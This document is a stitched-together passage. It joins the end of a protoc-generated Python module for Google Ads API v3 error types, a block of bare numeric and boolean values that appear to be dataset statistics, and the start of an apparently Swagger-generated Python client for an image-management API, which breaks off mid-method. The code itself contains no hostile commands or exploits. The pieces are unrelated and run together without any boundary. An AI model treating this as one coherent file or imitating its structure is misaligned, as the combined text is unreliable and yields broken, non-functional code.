_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['user_list_error'])
_ERRORCODE.fields_by_name['user_list_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['change_status_error'])
_ERRORCODE.fields_by_name['change_status_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_error'])
_ERRORCODE.fields_by_name['feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'])
_ERRORCODE.fields_by_name['geo_target_constant_suggestion_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_draft_error'])
_ERRORCODE.fields_by_name['campaign_draft_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_error'])
_ERRORCODE.fields_by_name['feed_item_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['label_error'])
_ERRORCODE.fields_by_name['label_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['billing_setup_error'])
_ERRORCODE.fields_by_name['billing_setup_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_client_link_error'])
_ERRORCODE.fields_by_name['customer_client_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_manager_link_error'])
_ERRORCODE.fields_by_name['customer_manager_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_mapping_error'])
_ERRORCODE.fields_by_name['feed_mapping_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['customer_feed_error'])
_ERRORCODE.fields_by_name['customer_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_group_feed_error'])
_ERRORCODE.fields_by_name['ad_group_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_feed_error'])
_ERRORCODE.fields_by_name['campaign_feed_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['custom_interest_error'])
_ERRORCODE.fields_by_name['custom_interest_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['campaign_experiment_error'])
_ERRORCODE.fields_by_name['campaign_experiment_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['extension_feed_item_error'])
_ERRORCODE.fields_by_name['extension_feed_item_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['ad_parameter_error'])
_ERRORCODE.fields_by_name['ad_parameter_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_validation_error'])
_ERRORCODE.fields_by_name['feed_item_validation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['extension_setting_error'])
_ERRORCODE.fields_by_name['extension_setting_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['feed_item_target_error'])
_ERRORCODE.fields_by_name['feed_item_target_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_violation_error'])
_ERRORCODE.fields_by_name['policy_violation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['mutate_job_error'])
_ERRORCODE.fields_by_name['mutate_job_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['partial_failure_error'])
_ERRORCODE.fields_by_name['partial_failure_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['policy_validation_parameter_error'])
_ERRORCODE.fields_by_name['policy_validation_parameter_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['size_limit_error'])
_ERRORCODE.fields_by_name['size_limit_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['offline_user_data_job_error'])
_ERRORCODE.fields_by_name['offline_user_data_job_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['not_whitelisted_error'])
_ERRORCODE.fields_by_name['not_whitelisted_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['manager_link_error'])
_ERRORCODE.fields_by_name['manager_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['currency_code_error'])
_ERRORCODE.fields_by_name['currency_code_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['access_invitation_error'])
_ERRORCODE.fields_by_name['access_invitation_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['reach_plan_error'])
_ERRORCODE.fields_by_name['reach_plan_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['invoice_error'])
_ERRORCODE.fields_by_name['invoice_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['payments_account_error'])
_ERRORCODE.fields_by_name['payments_account_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['time_zone_error'])
_ERRORCODE.fields_by_name['time_zone_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['asset_link_error'])
_ERRORCODE.fields_by_name['asset_link_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORCODE.oneofs_by_name['error_code'].fields.append(
_ERRORCODE.fields_by_name['user_data_error'])
_ERRORCODE.fields_by_name['user_data_error'].containing_oneof = _ERRORCODE.oneofs_by_name['error_code']
_ERRORLOCATION_FIELDPATHELEMENT.fields_by_name['index'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_ERRORLOCATION_FIELDPATHELEMENT.containing_type = _ERRORLOCATION
_ERRORLOCATION.fields_by_name['field_path_elements'].message_type = _ERRORLOCATION_FIELDPATHELEMENT
_ERRORDETAILS.fields_by_name['policy_violation_details'].message_type = _POLICYVIOLATIONDETAILS
_ERRORDETAILS.fields_by_name['policy_finding_details'].message_type = _POLICYFINDINGDETAILS
_POLICYVIOLATIONDETAILS.fields_by_name['key'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2._POLICYVIOLATIONKEY
_POLICYFINDINGDETAILS.fields_by_name['policy_topic_entries'].message_type = google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2._POLICYTOPICENTRY
DESCRIPTOR.message_types_by_name['GoogleAdsFailure'] = _GOOGLEADSFAILURE
DESCRIPTOR.message_types_by_name['GoogleAdsError'] = _GOOGLEADSERROR
DESCRIPTOR.message_types_by_name['ErrorCode'] = _ERRORCODE
DESCRIPTOR.message_types_by_name['ErrorLocation'] = _ERRORLOCATION
DESCRIPTOR.message_types_by_name['ErrorDetails'] = _ERRORDETAILS
DESCRIPTOR.message_types_by_name['PolicyViolationDetails'] = _POLICYVIOLATIONDETAILS
DESCRIPTOR.message_types_by_name['PolicyFindingDetails'] = _POLICYFINDINGDETAILS
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GoogleAdsFailure = _reflection.GeneratedProtocolMessageType('GoogleAdsFailure', (_message.Message,), dict(
DESCRIPTOR = _GOOGLEADSFAILURE,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Describes how a GoogleAds API call failed. It's returned inside
google.rpc.Status.details when a call fails.
Attributes:
errors:
The list of errors that occurred.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.GoogleAdsFailure)
))
_sym_db.RegisterMessage(GoogleAdsFailure)
GoogleAdsError = _reflection.GeneratedProtocolMessageType('GoogleAdsError', (_message.Message,), dict(
DESCRIPTOR = _GOOGLEADSERROR,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """GoogleAds-specific error.
Attributes:
error_code:
An enum value that indicates which error occurred.
message:
A human-readable description of the error.
trigger:
The value that triggered the error.
location:
Describes the part of the request proto that caused the error.
details:
Additional error details, which are returned by certain error
codes. Most error codes do not include details.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.GoogleAdsError)
))
_sym_db.RegisterMessage(GoogleAdsError)
ErrorCode = _reflection.GeneratedProtocolMessageType('ErrorCode', (_message.Message,), dict(
DESCRIPTOR = _ERRORCODE,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """The error reason represented by type and enum.
Attributes:
error_code:
The list of error enums
request_error:
An error caused by the request
bidding_strategy_error:
An error with a Bidding Strategy mutate.
url_field_error:
An error with a URL field mutate.
list_operation_error:
An error with a list operation.
query_error:
An error with an AWQL query
mutate_error:
An error with a mutate
field_mask_error:
An error with a field mask
authorization_error:
An error encountered when trying to authorize a user.
internal_error:
An unexpected server-side error.
quota_error:
An error with the amonut of quota remaining.
ad_error:
An error with an Ad Group Ad mutate.
ad_group_error:
An error with an Ad Group mutate.
campaign_budget_error:
An error with a Campaign Budget mutate.
campaign_error:
An error with a Campaign mutate.
authentication_error:
Indicates failure to properly authenticate user.
ad_group_criterion_error:
Indicates failure to properly authenticate user.
ad_customizer_error:
The reasons for the ad customizer error
ad_group_ad_error:
The reasons for the ad group ad error
ad_sharing_error:
The reasons for the ad sharing error
adx_error:
The reasons for the adx error
asset_error:
The reasons for the asset error
bidding_error:
The reasons for the bidding errors
campaign_criterion_error:
The reasons for the campaign criterion error
collection_size_error:
The reasons for the collection size error
country_code_error:
The reasons for the country code error
criterion_error:
The reasons for the criterion error
customer_error:
The reasons for the customer error
date_error:
The reasons for the date error
date_range_error:
The reasons for the date range error
distinct_error:
The reasons for the distinct error
feed_attribute_reference_error:
The reasons for the feed attribute reference error
function_error:
The reasons for the function error
function_parsing_error:
The reasons for the function parsing error
id_error:
The reasons for the id error
image_error:
The reasons for the image error
language_code_error:
The reasons for the language code error
media_bundle_error:
The reasons for the media bundle error
media_upload_error:
The reasons for media uploading errors.
media_file_error:
The reasons for the media file error
multiplier_error:
The reasons for the multiplier error
new_resource_creation_error:
The reasons for the new resource creation error
not_empty_error:
The reasons for the not empty error
null_error:
The reasons for the null error
operator_error:
The reasons for the operator error
range_error:
The reasons for the range error
recommendation_error:
The reasons for error in applying a recommendation
region_code_error:
The reasons for the region code error
setting_error:
The reasons for the setting error
string_format_error:
The reasons for the string format error
string_length_error:
The reasons for the string length error
operation_access_denied_error:
The reasons for the operation access denied error
resource_access_denied_error:
The reasons for the resource access denied error
resource_count_limit_exceeded_error:
The reasons for the resource count limit exceeded error
youtube_video_registration_error:
The reasons for YouTube video registration errors.
ad_group_bid_modifier_error:
The reasons for the ad group bid modifier error
context_error:
The reasons for the context error
field_error:
The reasons for the field error
shared_set_error:
The reasons for the shared set error
shared_criterion_error:
The reasons for the shared criterion error
campaign_shared_set_error:
The reasons for the campaign shared set error
conversion_action_error:
The reasons for the conversion action error
conversion_adjustment_upload_error:
The reasons for the conversion adjustment upload error
conversion_upload_error:
The reasons for the conversion upload error
header_error:
The reasons for the header error.
database_error:
The reasons for the database error.
policy_finding_error:
The reasons for the policy finding error.
enum_error:
The reason for enum error.
keyword_plan_error:
The reason for keyword plan error.
keyword_plan_campaign_error:
The reason for keyword plan campaign error.
keyword_plan_negative_keyword_error:
The reason for keyword plan negative keyword error.
keyword_plan_ad_group_error:
The reason for keyword plan ad group error.
keyword_plan_keyword_error:
The reason for keyword plan keyword error.
keyword_plan_idea_error:
The reason for keyword idea error.
account_budget_proposal_error:
The reasons for account budget proposal errors.
user_list_error:
The reasons for the user list error
change_status_error:
The reasons for the change status error
feed_error:
The reasons for the feed error
geo_target_constant_suggestion_error:
The reasons for the geo target constant suggestion error.
campaign_draft_error:
The reasons for the campaign draft error
feed_item_error:
The reasons for the feed item error
label_error:
The reason for the label error.
billing_setup_error:
The reasons for the billing setup error
customer_client_link_error:
The reasons for the customer client link error
customer_manager_link_error:
The reasons for the customer manager link error
feed_mapping_error:
The reasons for the feed mapping error
customer_feed_error:
The reasons for the customer feed error
ad_group_feed_error:
The reasons for the ad group feed error
campaign_feed_error:
The reasons for the campaign feed error
custom_interest_error:
The reasons for the custom interest error
campaign_experiment_error:
The reasons for the campaign experiment error
extension_feed_item_error:
The reasons for the extension feed item error
ad_parameter_error:
The reasons for the ad parameter error
feed_item_validation_error:
The reasons for the feed item validation error
extension_setting_error:
The reasons for the extension setting error
feed_item_target_error:
The reasons for the feed item target error
policy_violation_error:
The reasons for the policy violation error
mutate_job_error:
The reasons for the mutate job error
partial_failure_error:
The reasons for the mutate job error
policy_validation_parameter_error:
The reasons for the policy validation parameter error
size_limit_error:
The reasons for the size limit error
offline_user_data_job_error:
The reasons for the offline user data job error.
not_whitelisted_error:
The reasons for the not whitelisted error
manager_link_error:
The reasons for the manager link error
currency_code_error:
The reasons for the currency code error
access_invitation_error:
The reasons for the access invitation error
reach_plan_error:
The reasons for the reach plan error
invoice_error:
The reasons for the invoice error
payments_account_error:
The reasons for errors in payments accounts service
time_zone_error:
The reasons for the time zone error
asset_link_error:
The reasons for the asset link error
user_data_error:
The reasons for the user data error.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorCode)
))
_sym_db.RegisterMessage(ErrorCode)
ErrorLocation = _reflection.GeneratedProtocolMessageType('ErrorLocation', (_message.Message,), dict(
FieldPathElement = _reflection.GeneratedProtocolMessageType('FieldPathElement', (_message.Message,), dict(
DESCRIPTOR = _ERRORLOCATION_FIELDPATHELEMENT,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """A part of a field path.
Attributes:
field_name:
The name of a field or a oneof
index:
If field\_name is a repeated field, this is the element that
failed
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement)
))
,
DESCRIPTOR = _ERRORLOCATION,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Describes the part of the request proto that caused the error.
Attributes:
field_path_elements:
A field path that indicates which field was invalid in the
request.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorLocation)
))
_sym_db.RegisterMessage(ErrorLocation)
_sym_db.RegisterMessage(ErrorLocation.FieldPathElement)
ErrorDetails = _reflection.GeneratedProtocolMessageType('ErrorDetails', (_message.Message,), dict(
DESCRIPTOR = _ERRORDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Additional error details.
Attributes:
unpublished_error_code:
The error code that should have been returned, but wasn't.
This is used when the error code is
InternalError.ERROR\_CODE\_NOT\_PUBLISHED.
policy_violation_details:
Describes an ad policy violation.
policy_finding_details:
Describes policy violation findings.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.ErrorDetails)
))
_sym_db.RegisterMessage(ErrorDetails)
PolicyViolationDetails = _reflection.GeneratedProtocolMessageType('PolicyViolationDetails', (_message.Message,), dict(
DESCRIPTOR = _POLICYVIOLATIONDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Error returned as part of a mutate response. This error indicates single
policy violation by some text in one of the fields.
Attributes:
external_policy_description:
Human readable description of policy violation.
key:
Unique identifier for this violation. If policy is exemptible,
this key may be used to request exemption.
external_policy_name:
Human readable name of the policy.
is_exemptible:
Whether user can file an exemption request for this violation.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.PolicyViolationDetails)
))
_sym_db.RegisterMessage(PolicyViolationDetails)
PolicyFindingDetails = _reflection.GeneratedProtocolMessageType('PolicyFindingDetails', (_message.Message,), dict(
DESCRIPTOR = _POLICYFINDINGDETAILS,
__module__ = 'google.ads.googleads_v3.proto.errors.errors_pb2'
,
__doc__ = """Error returned as part of a mutate response. This error indicates one or
more policy findings in the fields of a resource.
Attributes:
policy_topic_entries:
The list of policy topics for the resource. Contains the
PROHIBITED or FULLY\_LIMITED policy topic entries that
prevented the resource from being saved (among any other
entries the resource may also have).
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.PolicyFindingDetails)
))
_sym_db.RegisterMessage(PolicyFindingDetails)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 82.349543
| 24,384
| 0.832045
| 24,438
| 171,040
| 5.301211
| 0.043784
| 0.063002
| 0.043442
| 0.039367
| 0.807188
| 0.785289
| 0.751843
| 0.714699
| 0.674182
| 0.623886
| 0
| 0.031037
| 0.079783
| 171,040
| 2,076
| 24,385
| 82.38921
| 0.792063
| 0.005291
| 0
| 0.461997
| 1
| 0.066567
| 0.302097
| 0.202379
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.059613
| 0
| 0.059613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c764846d2d2ac5223bc2f83a18fa911e797677da
| 43,546
|
py
|
Python
|
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | 1
|
2018-03-26T23:54:59.000Z
|
2018-03-26T23:54:59.000Z
|
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | null | null | null |
layint_runtime_api/apis/image_api.py
|
LayeredInsight/layint_runtime_api_python
|
0e24f2cc5bf342505d6ec9af19323819b1a70d4d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Layered Witness & Control
LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.9.7
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImageApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_image(self, **kwargs):
"""
Create new image definition
Creates a image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_image_with_http_info(**kwargs)
else:
(data) = self.add_image_with_http_info(**kwargs)
return data
def add_image_with_http_info(self, **kwargs):
"""
Create new image definition
Creates a image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image', 'instrument_image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'instrument_image' in params:
query_params.append(('InstrumentImage', params['instrument_image']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_configuration_to_image(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
else:
(data) = self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
return data
def assign_configuration_to_image_with_http_info(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image_with_http_info(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'config_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_configuration_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_configuration_to_image`")
# verify the required parameter 'config_id' is set
if ('config_id' not in params) or (params['config_id'] is None):
raise ValueError("Missing the required parameter `config_id` when calling `assign_configuration_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'config_id' in params:
path_params['configID'] = params['config_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Configs/{configID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_policy_to_image(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
else:
(data) = self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
return data
def assign_policy_to_image_with_http_info(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image_with_http_info(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'policy_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_policy_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_policy_to_image`")
# verify the required parameter 'policy_id' is set
if ('policy_id' not in params) or (params['policy_id'] is None):
raise ValueError("Missing the required parameter `policy_id` when calling `assign_policy_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'policy_id' in params:
path_params['policyID'] = params['policy_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Policies/{policyID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_image(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_image_with_http_info(image_id, **kwargs)
else:
(data) = self.delete_image_with_http_info(image_id, **kwargs)
return data
def delete_image_with_http_info(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
